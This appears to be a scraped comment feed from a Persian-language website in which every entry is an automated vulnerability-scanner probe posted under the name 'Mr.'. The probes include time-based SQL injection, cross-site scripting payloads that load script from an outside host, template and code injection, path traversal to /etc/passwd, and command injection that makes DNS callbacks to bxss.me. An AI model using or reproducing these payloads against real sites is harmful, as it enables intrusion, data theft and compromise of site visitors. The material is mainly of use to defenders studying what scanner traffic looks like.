05/08/1400 05:37 ب.ظ
Mr.

-1; waitfor delay '0:0:15' --

05/08/1400 05:37 ب.ظ
Mr.

-1); waitfor delay '0:0:15' --

05/08/1400 05:37 ب.ظ
Mr.

-1)); waitfor delay '0:0:15' --

05/08/1400 05:37 ب.ظ
Mr.

1 waitfor delay '0:0:15' --

05/08/1400 05:37 ب.ظ
Mr.

GBmGz3s9'; waitfor delay '0:0:15' --

05/08/1400 05:38 ب.ظ
Mr.

Oigp6pNH'); waitfor delay '0:0:15' --

05/08/1400 05:38 ب.ظ
Mr.

P29lMeuI')); waitfor delay '0:0:15' --

05/08/1400 05:38 ب.ظ
Mr.

-5 OR 404=(SELECT 404 FROM PG_SLEEP(15))--

05/08/1400 05:38 ب.ظ
Mr.

-5) OR 541=(SELECT 541 FROM PG_SLEEP(15))--

05/08/1400 05:38 ب.ظ
Mr.

-1)) OR 948=(SELECT 948 FROM PG_SLEEP(15))--

05/08/1400 05:38 ب.ظ
Mr.

ckkoMpnq' OR 415=(SELECT 415 FROM PG_SLEEP(15))--

05/08/1400 05:38 ب.ظ
Mr.

M53qZ0bA') OR 556=(SELECT 556 FROM PG_SLEEP(15))--

05/08/1400 05:38 ب.ظ
Mr.

suTJS1It')) OR 406=(SELECT 406 FROM PG_SLEEP(15))--

05/08/1400 05:38 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 05:38 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 05:38 ب.ظ
Mr.

1'"

05/08/1400 05:38 ب.ظ
Mr.

1����%2527%2522

05/08/1400 05:38 ب.ظ
Mr.

@@mONJf

05/08/1400 05:49 ب.ظ
Mr.

'"()&%<acx><ScRiPt >UfEu(9208)</ScRiPt>

05/08/1400 05:49 ب.ظ
Mr.

'"()&%<acx><ScRiPt >UfEu(9553)</ScRiPt>

05/08/1400 05:49 ب.ظ
Mr.

9897980

05/08/1400 05:50 ب.ظ
Mr.

acu2403<s1﹥s2ʺs3ʹuca2403

05/08/1400 05:50 ب.ظ
Mr.

acux2785��z1��z2a�bcxuca2785

05/08/1400 05:50 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 05:50 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 05:50 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 05:50 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 05:50 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 05:50 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 05:50 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 05:50 ب.ظ
Mr.

<ScRiPt >UfEu(9617)</ScRiPt>

05/08/1400 05:51 ب.ظ
Mr.

<WOIVVY>5MW43[!+!]</WOIVVY>

05/08/1400 05:51 ب.ظ
Mr.

<script>UfEu(9683)</script>

05/08/1400 05:51 ب.ظ
Mr.

<ScR<ScRiPt>IpT>UfEu(9182)</sCr<ScRiPt>IpT>

05/08/1400 05:51 ب.ظ
Mr.

<ScRiPt
>UfEu(9537)</ScRiPt>

05/08/1400 05:51 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9324></ScRiPt>

05/08/1400 05:51 ب.ظ
Mr.

<ScRiPt
>UfEu(9268)</ScRiPt>

05/08/1400 05:51 ب.ظ
Mr.

<svg  

�onload=UfEu(9882);>

05/08/1400 05:51 ب.ظ
Mr.

<isindex type=image src=1 onerror=UfEu(9293)>

05/08/1400 05:51 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9144'>

05/08/1400 05:52 ب.ظ
Mr.

<body onload=UfEu(9376)>

05/08/1400 05:52 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=UfEu(9147)>

05/08/1400 05:52 ب.ظ
Mr.

<img src=xyz OnErRor=UfEu(9110)>

05/08/1400 05:52 ب.ظ
Mr.

<img/src=">" onerror=alert(9094)>

05/08/1400 05:52 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%55%66%45%75%289209%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 05:52 ب.ظ
Mr.

\u003CScRiPt\UfEu(9289)\u003C/sCripT\u003E

05/08/1400 05:52 ب.ظ
Mr.

&lt;ScRiPt&gt;UfEu(9101)&lt;/sCripT&gt;

05/08/1400 05:52 ب.ظ
Mr.

�<img acu onmouseover=UfEu(91931) //�>

05/08/1400 05:52 ب.ظ
Mr.

<input autofocus onfocus=UfEu(9012)>

05/08/1400 05:52 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 05:52 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 05:53 ب.ظ
Mr.

}body{acu:Expre/**/SSion(UfEu(9729))}

05/08/1400 05:53 ب.ظ
Mr.

<% contenteditable onresize=UfEu(9610)>

05/08/1400 05:53 ب.ظ
Mr.

MDhpF
<ScRiPt >UfEu(9494)</ScRiPt>

05/08/1400 05:53 ب.ظ
Mr.

<WRWXOF>GB06A[!+!]</WRWXOF>

05/08/1400 05:53 ب.ظ
Mr.

<ifRAme sRc=9077.com></IfRamE>

05/08/1400 05:53 ب.ظ
Mr.

<lu0OVe x=9185>

05/08/1400 05:53 ب.ظ
Mr.

<img sRc='http://attacker-9732/log.php?

05/08/1400 05:53 ب.ظ
Mr.

<KAbePi<

05/08/1400 05:56 ب.ظ
Mr.

response.write(9567728*9930115)

05/08/1400 05:56 ب.ظ
Mr.

'+response.write(9567728*9930115)+'

05/08/1400 05:56 ب.ظ
Mr.

"+response.write(9567728*9930115)+"

05/08/1400 05:56 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 05:56 ب.ظ
Mr.

echo tmicxr$()\ eeopdi\nz^xyu||a #' &echo tmicxr$()\ eeopdi\nz^xyu||a #|" &echo tmicxr$()\ eeopdi\nz^xyu||a #

05/08/1400 05:56 ب.ظ
Mr.

&echo rlivtd$()\ dwgxhy\nz^xyu||a #' &echo rlivtd$()\ dwgxhy\nz^xyu||a #|" &echo rlivtd$()\ dwgxhy\nz^xyu||a #

05/08/1400 05:56 ب.ظ
Mr.

|echo xilwol$()\ dphsew\nz^xyu||a #' |echo xilwol$()\ dphsew\nz^xyu||a #|" |echo xilwol$()\ dphsew\nz^xyu||a #

05/08/1400 05:56 ب.ظ
Mr.

(nslookup hitjcutxmteik24277.bxss.me||perl -e "gethostbyname('hitjcutxmteik24277.bxss.me')")

05/08/1400 05:56 ب.ظ
Mr.

$(nslookup hituojvusizwm3ad2f.bxss.me||perl -e "gethostbyname('hituojvusizwm3ad2f.bxss.me')")

05/08/1400 05:56 ب.ظ
Mr.

&(nslookup hittqdpznzssvba557.bxss.me||perl -e "gethostbyname('hittqdpznzssvba557.bxss.me')")&'\"`0&(nslookup hittqdpznzssvba557.bxss.me||perl -e "gethostbyname('hittqdpznzssvba557.bxss.me')")&`'

05/08/1400 05:56 ب.ظ
Mr.

|(nslookup hitacyjvvbfig338dd.bxss.me||perl -e "gethostbyname('hitacyjvvbfig338dd.bxss.me')")

05/08/1400 05:56 ب.ظ
Mr.

`(nslookup hitvarrhtnvww912cc.bxss.me||perl -e "gethostbyname('hitvarrhtnvww912cc.bxss.me')")`

05/08/1400 05:56 ب.ظ
Mr.

;(nslookup hitdsgmnbqtfp2e1de.bxss.me||perl -e "gethostbyname('hitdsgmnbqtfp2e1de.bxss.me')")|(nslookup hitdsgmnbqtfp2e1de.bxss.me||perl -e "gethostbyname('hitdsgmnbqtfp2e1de.bxss.me')")&(nslookup hitdsgmnbqtfp2e1de.bxss.me||perl -e "gethostbyname('hitdsgmnbqtfp2e1de.bxss.me')")

05/08/1400 05:56 ب.ظ
Mr.

Ce5CdEo1

05/08/1400 05:56 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 05:56 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 05:56 ب.ظ
Mr.

../

05/08/1400 05:56 ب.ظ
Mr.

./

05/08/1400 05:57 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 05:57 ب.ظ
Mr.

${10000199+9999759}

05/08/1400 05:57 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 05:57 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 05:57 ب.ظ
Mr.

&n965320=v933402

05/08/1400 05:57 ب.ظ
Mr.

)

05/08/1400 05:57 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 05:57 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 05:57 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 05:57 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 05:57 ب.ظ
Mr.

bxss.me

05/08/1400 05:57 ب.ظ
Mr.

'"()

05/08/1400 05:57 ب.ظ
Mr.

'.gethostbyname(lc('hitar'.'ndfhzslkda00d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(66).chr(119).chr(65).'

05/08/1400 05:57 ب.ظ
Mr.

".gethostbyname(lc("hitzp"."yejtyznd578ed.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(85).chr(113).chr(66)."

05/08/1400 05:57 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 05:57 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 05:57 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 05:57 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 05:57 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 05:57 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 05:57 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 05:57 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 05:57 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 05:57 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(115).concat(89).concat(102).concat(82)+(require"socket"
Socket.gethostbyname("hitzb"+"kijdqzlw17b66.bxss.me.")[3].to_s)+"

05/08/1400 05:57 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(109).concat(75).concat(108).concat(67)+(require'socket'
Socket.gethostbyname('hitfx'+'axoikjpo19b5f.bxss.me.')[3].to_s)+'

05/08/1400 05:58 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9

05/08/1400 05:58 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9

05/08/1400 05:58 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9/.

05/08/1400 05:58 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 05:58 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 05:58 ب.ظ
Mr.

'"

05/08/1400 05:58 ب.ظ
Mr.

<!--

05/08/1400 05:58 ب.ظ
Mr.

'"()&%<acx><ScRiPt >DHQz(9648)</ScRiPt>

05/08/1400 05:58 ب.ظ
Mr.

'"()&%<acx><ScRiPt >DHQz(9695)</ScRiPt>

05/08/1400 05:58 ب.ظ
Mr.

9250460

05/08/1400 05:58 ب.ظ
Mr.

acu1819<s1﹥s2ʺs3ʹuca1819

05/08/1400 05:58 ب.ظ
Mr.

acux1929��z1��z2a�bcxuca1929

05/08/1400 05:58 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 05:58 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 05:58 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 05:59 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 05:59 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 05:59 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 05:59 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 05:59 ب.ظ
Mr.

<ScRiPt >DHQz(9265)</ScRiPt>

05/08/1400 05:59 ب.ظ
Mr.

<WBHRXX>FVALV[!+!]</WBHRXX>

05/08/1400 05:59 ب.ظ
Mr.

<script>DHQz(9209)</script>

05/08/1400 05:59 ب.ظ
Mr.

<ScR<ScRiPt>IpT>DHQz(9700)</sCr<ScRiPt>IpT>

05/08/1400 05:59 ب.ظ
Mr.

<ScRiPt
>DHQz(9995)</ScRiPt>

05/08/1400 05:59 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9705></ScRiPt>

05/08/1400 05:59 ب.ظ
Mr.

<ScRiPt
>DHQz(9468)</ScRiPt>

05/08/1400 05:59 ب.ظ
Mr.

<svg  

�onload=DHQz(9268);>

05/08/1400 06:00 ب.ظ
Mr.

<isindex type=image src=1 onerror=DHQz(9882)>

05/08/1400 06:00 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9358'>

05/08/1400 06:00 ب.ظ
Mr.

<body onload=DHQz(9818)>

05/08/1400 06:00 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=DHQz(9821)>

05/08/1400 06:00 ب.ظ
Mr.

<img src=xyz OnErRor=DHQz(9769)>

05/08/1400 06:00 ب.ظ
Mr.

<img/src=">" onerror=alert(9282)>

05/08/1400 06:00 ب.ظ
Mr.

%0D%0A%0D%0A%0D%0A%3C%53%63%52%69%50%74%20%3E%44%48%51%7A%289375%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 06:00 ب.ظ
Mr.

\u003CScRiPt\DHQz(9859)\u003C/sCripT\u003E

05/08/1400 06:00 ب.ظ
Mr.

&lt;ScRiPt&gt;DHQz(9090)&lt;/sCripT&gt;

05/08/1400 06:00 ب.ظ
Mr.

�<img acu onmouseover=DHQz(90921) //�>

05/08/1400 06:00 ب.ظ
Mr.

<input autofocus onfocus=DHQz(9140)>

05/08/1400 06:00 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 06:00 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 06:00 ب.ظ
Mr.

}body{acu:Expre/**/SSion(DHQz(9270))}

05/08/1400 06:00 ب.ظ
Mr.

<% contenteditable onresize=DHQz(9990)>

05/08/1400 06:01 ب.ظ
Mr.

pEtOq
<ScRiPt >DHQz(9954)</ScRiPt>

05/08/1400 06:01 ب.ظ
Mr.

<WLTFEP>VPZAD[!+!]</WLTFEP>

05/08/1400 06:01 ب.ظ
Mr.

<ifRAme sRc=9004.com></IfRamE>

05/08/1400 06:01 ب.ظ
Mr.

<GiQ5bX x=9897>

05/08/1400 06:01 ب.ظ
Mr.

<img sRc='http://attacker-9017/log.php?

05/08/1400 06:01 ب.ظ
Mr.

<fXRe0Y<

05/08/1400 06:10 ب.ظ
Mr.

-1 OR 2+774-774-1=0+0+0+1 --

05/08/1400 06:10 ب.ظ
Mr.

-1 OR 3+774-774-1=0+0+0+1 --

05/08/1400 06:10 ب.ظ
Mr.

-1 OR 2+537-537-1=0+0+0+1

05/08/1400 06:10 ب.ظ
Mr.

-1 OR 3+537-537-1=0+0+0+1

05/08/1400 06:10 ب.ظ
Mr.

-1' OR 2+35-35-1=0+0+0+1 --

05/08/1400 06:10 ب.ظ
Mr.

-1' OR 3+35-35-1=0+0+0+1 --

05/08/1400 06:10 ب.ظ
Mr.

-1' OR 2+475-475-1=0+0+0+1 or 'ObDovRm1'='

05/08/1400 06:10 ب.ظ
Mr.

-1' OR 3+475-475-1=0+0+0+1 or 'ObDovRm1'='

05/08/1400 06:10 ب.ظ
Mr.

-1" OR 2+28-28-1=0+0+0+1 --

05/08/1400 06:10 ب.ظ
Mr.

-1" OR 3+28-28-1=0+0+0+1 --

05/08/1400 06:11 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 06:11 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 06:11 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 06:11 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

05/08/1400 06:11 ب.ظ
Mr.

-1; waitfor delay '0:0:15' --

05/08/1400 06:11 ب.ظ
Mr.

-1); waitfor delay '0:0:15' --

05/08/1400 06:11 ب.ظ
Mr.

-1)); waitfor delay '0:0:15' --

05/08/1400 06:11 ب.ظ
Mr.

1 waitfor delay '0:0:15' --

05/08/1400 06:11 ب.ظ
Mr.

7XTYgQ4j'; waitfor delay '0:0:15' --

05/08/1400 06:11 ب.ظ
Mr.

rMt3q1do'); waitfor delay '0:0:15' --

05/08/1400 06:11 ب.ظ
Mr.

jFJr4Jia')); waitfor delay '0:0:15' --

05/08/1400 06:11 ب.ظ
Mr.

-5 OR 986=(SELECT 986 FROM PG_SLEEP(15))--

05/08/1400 06:11 ب.ظ
Mr.

-5) OR 153=(SELECT 153 FROM PG_SLEEP(15))--

05/08/1400 06:11 ب.ظ
Mr.

-1)) OR 809=(SELECT 809 FROM PG_SLEEP(15))--

05/08/1400 06:11 ب.ظ
Mr.

jdA8LnBS' OR 374=(SELECT 374 FROM PG_SLEEP(15))--

05/08/1400 06:11 ب.ظ
Mr.

bBqT45HF') OR 210=(SELECT 210 FROM PG_SLEEP(15))--

05/08/1400 06:11 ب.ظ
Mr.

nkcPHdJf')) OR 76=(SELECT 76 FROM PG_SLEEP(15))--

05/08/1400 06:11 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 06:12 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 06:12 ب.ظ
Mr.

1'"

05/08/1400 06:12 ب.ظ
Mr.

1����%2527%2522

05/08/1400 06:12 ب.ظ
Mr.

@@ALJbr

05/08/1400 06:25 ب.ظ
Mr.

response.write(9634299*9894511)

05/08/1400 06:25 ب.ظ
Mr.

'+response.write(9634299*9894511)+'

05/08/1400 06:25 ب.ظ
Mr.

"+response.write(9634299*9894511)+"

05/08/1400 06:25 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 06:25 ب.ظ
Mr.

echo iyioxq$()\ ldiqax\nz^xyu||a #' &echo iyioxq$()\ ldiqax\nz^xyu||a #|" &echo iyioxq$()\ ldiqax\nz^xyu||a #

05/08/1400 06:25 ب.ظ
Mr.

&echo aousns$()\ srlcsa\nz^xyu||a #' &echo aousns$()\ srlcsa\nz^xyu||a #|" &echo aousns$()\ srlcsa\nz^xyu||a #

05/08/1400 06:25 ب.ظ
Mr.

|echo glosos$()\ pmzohq\nz^xyu||a #' |echo glosos$()\ pmzohq\nz^xyu||a #|" |echo glosos$()\ pmzohq\nz^xyu||a #

05/08/1400 06:25 ب.ظ
Mr.

(nslookup hittpoopjulgx09ca5.bxss.me||perl -e "gethostbyname('hittpoopjulgx09ca5.bxss.me')")

05/08/1400 06:25 ب.ظ
Mr.

$(nslookup hitthapsmuzqo3381f.bxss.me||perl -e "gethostbyname('hitthapsmuzqo3381f.bxss.me')")

05/08/1400 06:25 ب.ظ
Mr.

&(nslookup hityyghbguyis4fa18.bxss.me||perl -e "gethostbyname('hityyghbguyis4fa18.bxss.me')")&'\"`0&(nslookup hityyghbguyis4fa18.bxss.me||perl -e "gethostbyname('hityyghbguyis4fa18.bxss.me')")&`'

05/08/1400 06:25 ب.ظ
Mr.

|(nslookup hitofrrygnhvbf1068.bxss.me||perl -e "gethostbyname('hitofrrygnhvbf1068.bxss.me')")

05/08/1400 06:25 ب.ظ
Mr.

`(nslookup hitntdlvvuyctf84aa.bxss.me||perl -e "gethostbyname('hitntdlvvuyctf84aa.bxss.me')")`

05/08/1400 06:25 ب.ظ
Mr.

;(nslookup hitalvfuyxytl23350.bxss.me||perl -e "gethostbyname('hitalvfuyxytl23350.bxss.me')")|(nslookup hitalvfuyxytl23350.bxss.me||perl -e "gethostbyname('hitalvfuyxytl23350.bxss.me')")&(nslookup hitalvfuyxytl23350.bxss.me||perl -e "gethostbyname('hitalvfuyxytl23350.bxss.me')")

05/08/1400 06:26 ب.ظ
Mr.

z59NgCSQ

05/08/1400 06:26 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 06:26 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 06:26 ب.ظ
Mr.

../

05/08/1400 06:26 ب.ظ
Mr.

./

05/08/1400 06:26 ب.ظ
Mr.

12345'"\'\");|]*{
<>�''💡

05/08/1400 06:26 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 06:26 ب.ظ
Mr.

${9999950+10000293}

05/08/1400 06:26 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 06:26 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 06:26 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 06:26 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 06:26 ب.ظ
Mr.

bxss.me

05/08/1400 06:27 ب.ظ
Mr.

&n945048=v924464

05/08/1400 06:27 ب.ظ
Mr.

)

05/08/1400 06:27 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 06:27 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 06:27 ب.ظ
Mr.

'"()

05/08/1400 06:27 ب.ظ
Mr.

'.gethostbyname(lc('hitdt'.'lsrtzlnp9707f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(65).chr(105).chr(88).'

05/08/1400 06:27 ب.ظ
Mr.

".gethostbyname(lc("hitvu"."afegafya6a97e.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(69).chr(112).chr(89)."

05/08/1400 06:27 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 06:27 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 06:27 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 06:27 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 06:27 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 06:27 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 06:27 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 06:27 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 06:27 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 06:27 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(101).concat(69).concat(106).concat(88)+(require"socket"
Socket.gethostbyname("hitum"+"ppyvtthc64354.bxss.me.")[3].to_s)+"

05/08/1400 06:27 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(122).concat(68).concat(111).concat(75)+(require'socket'
Socket.gethostbyname('hitdo'+'jhmbujuka9029.bxss.me.')[3].to_s)+'

05/08/1400 06:28 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9

05/08/1400 06:28 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9

05/08/1400 06:28 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-9/.

05/08/1400 06:28 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 06:28 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 06:28 ب.ظ
Mr.

'"

05/08/1400 06:28 ب.ظ
Mr.

<!--

05/08/1400 06:29 ب.ظ
Mr.

'"()&%<acx><ScRiPt >WrOa(9104)</ScRiPt>

05/08/1400 06:29 ب.ظ
Mr.

'"()&%<acx><ScRiPt >WrOa(9607)</ScRiPt>

05/08/1400 06:29 ب.ظ
Mr.

9311197

05/08/1400 06:29 ب.ظ
Mr.

acu7411<s1﹥s2ʺs3ʹuca7411

05/08/1400 06:29 ب.ظ
Mr.

acux9661��z1��z2a�bcxuca9661

05/08/1400 06:29 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 06:29 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 06:29 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 06:29 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 06:29 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 06:29 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 06:29 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 06:29 ب.ظ
Mr.

<ScRiPt >WrOa(9006)</ScRiPt>

05/08/1400 06:29 ب.ظ
Mr.

<W4HONT>QPGGF[!+!]</W4HONT>

05/08/1400 06:30 ب.ظ
Mr.

<script>WrOa(9151)</script>

05/08/1400 06:30 ب.ظ
Mr.

<ScR<ScRiPt>IpT>WrOa(9956)</sCr<ScRiPt>IpT>

05/08/1400 06:30 ب.ظ
Mr.

<ScRiPt
>WrOa(9813)</ScRiPt>

05/08/1400 06:30 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9757></ScRiPt>

05/08/1400 06:30 ب.ظ
Mr.

<ScRiPt
>WrOa(9809)</ScRiPt>

05/08/1400 06:30 ب.ظ
Mr.

<svg  

�onload=WrOa(9300);>

05/08/1400 06:30 ب.ظ
Mr.

<isindex type=image src=1 onerror=WrOa(9122)>

05/08/1400 06:30 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9663'>

05/08/1400 06:30 ب.ظ
Mr.

<body onload=WrOa(9300)>

05/08/1400 06:30 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=WrOa(9152)>

05/08/1400 06:30 ب.ظ
Mr.

<img src=xyz OnErRor=WrOa(9285)>

05/08/1400 06:30 ب.ظ
Mr.

<img/src=">" onerror=alert(9000)>

05/08/1400 06:30 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%57%72%4F%61%289438%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 06:31 ب.ظ
Mr.

\u003CScRiPt\WrOa(9362)\u003C/sCripT\u003E

05/08/1400 06:31 ب.ظ
Mr.

&lt;ScRiPt&gt;WrOa(9722)&lt;/sCripT&gt;

05/08/1400 06:31 ب.ظ
Mr.

�<img acu onmouseover=WrOa(94941) //�>

05/08/1400 06:31 ب.ظ
Mr.

<input autofocus onfocus=WrOa(9298)>

05/08/1400 06:31 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 06:31 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 06:31 ب.ظ
Mr.

}body{acu:Expre/**/SSion(WrOa(9772))}

05/08/1400 06:31 ب.ظ
Mr.

<% contenteditable onresize=WrOa(9338)>

05/08/1400 06:31 ب.ظ
Mr.

CNFmG
<ScRiPt >WrOa(9956)</ScRiPt>

05/08/1400 06:31 ب.ظ
Mr.

<WBSFOR>GZ9DD[!+!]</WBSFOR>

05/08/1400 06:31 ب.ظ
Mr.

<ifRAme sRc=9556.com></IfRamE>

05/08/1400 06:32 ب.ظ
Mr.

<zUJnpg x=9475>

05/08/1400 06:32 ب.ظ
Mr.

<img sRc='http://attacker-9211/log.php?

05/08/1400 06:32 ب.ظ
Mr.

<ugvKZ6<